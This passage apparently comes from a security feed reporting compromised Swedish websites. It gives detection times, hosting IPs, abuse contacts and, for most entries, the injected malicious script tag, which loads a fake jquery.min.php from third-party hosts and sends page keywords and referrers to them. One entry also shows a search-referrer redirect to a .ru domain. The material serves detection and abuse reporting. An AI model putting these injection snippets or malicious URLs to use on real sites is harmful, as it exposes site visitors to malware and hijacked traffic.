keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://www.horizonvita.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>www.kraftservice.se is on 194.9.94.50<br>ASN for 194.9.94.50: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.50 corresponds with s432.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467273116http://ledlampor.nu/ (194.9.94.155) - Serp-hijackingAttacked url: http://ledlampor.nu/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 27 Jun 2016 13:23:56 +0200<br><br>Visitors with referer are redirected to http://guysflinching.ru/extended?7 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 403 Forbidden <br>Server: nginx/1.10.1 <br>Date: Mon, 27 Jun 2016 11:23:41 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Referer: http://www.google.com/search?q=ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.1 <br>Date: Mon, 27 Jun 2016 11:23:41 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://guysflinching.ru/extended?7<br><br>ledlampor.nu is on 194.9.94.155<br>ASN for 194.9.94.155: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.155 corresponds with s362.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467095669http://ccevent.se/ (194.9.95.229) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://89.161.156.246/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://89.161.156.246/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://89.161.156.246/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>ccevent.se is on 194.9.95.229<br>ASN for 194.9.95.229: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.229 corresponds with s476.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467094878http://pconline.se/ (194.9.94.207) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://java.novgorod.ru/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://java.novgorod.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://java.novgorod.ru/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>pconline.se is on 194.9.94.207<br>ASN for 194.9.94.207: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.207 corresponds with s113.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1466413290http://local-hero.se/ (194.9.94.86) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://freedomfitnessandworkout.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://freedomfitnessandworkout.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://freedomfitnessandworkout.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>local-hero.se is on 194.9.94.86<br>ASN for 194.9.94.86: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.86<br>Found address in whois: abuse@loopia.se1466413090http://xn--vnerhamnar-q5a.se/ (194.9.94.85) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://new.gruppoab.it/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://new.gruppoab.it/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://new.gruppoab.it/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>xn--vnerhamnar-q5a.se is on 194.9.94.85<br>ASN for 194.9.94.85: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.85<br>Found address in whois: abuse@loopia.se1465978233http://pconline.se/ (194.9.94.207) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.vermessung-stuetz.de/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://www.vermessung-stuetz.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://www.vermessung-stuetz.de/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>pconline.se is on 194.9.94.207<br>ASN for 194.9.94.207: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.207 corresponds with s113.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1465886621http://clevercord.se/ (194.9.94.207) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://itokiusa.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://itokiusa.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://itokiusa.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>clevercord.se is on 194.9.94.207<br>ASN for 194.9.94.207: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.207 corresponds with s113.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1465543132http://colouroflove.nu/ (194.9.94.86) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://deltrax.de/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://deltrax.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://deltrax.de/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>colouroflove.nu is on 194.9.94.86<br>ASN for 194.9.94.86: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.86<br>Found address in whois: abuse@loopia.se1465542226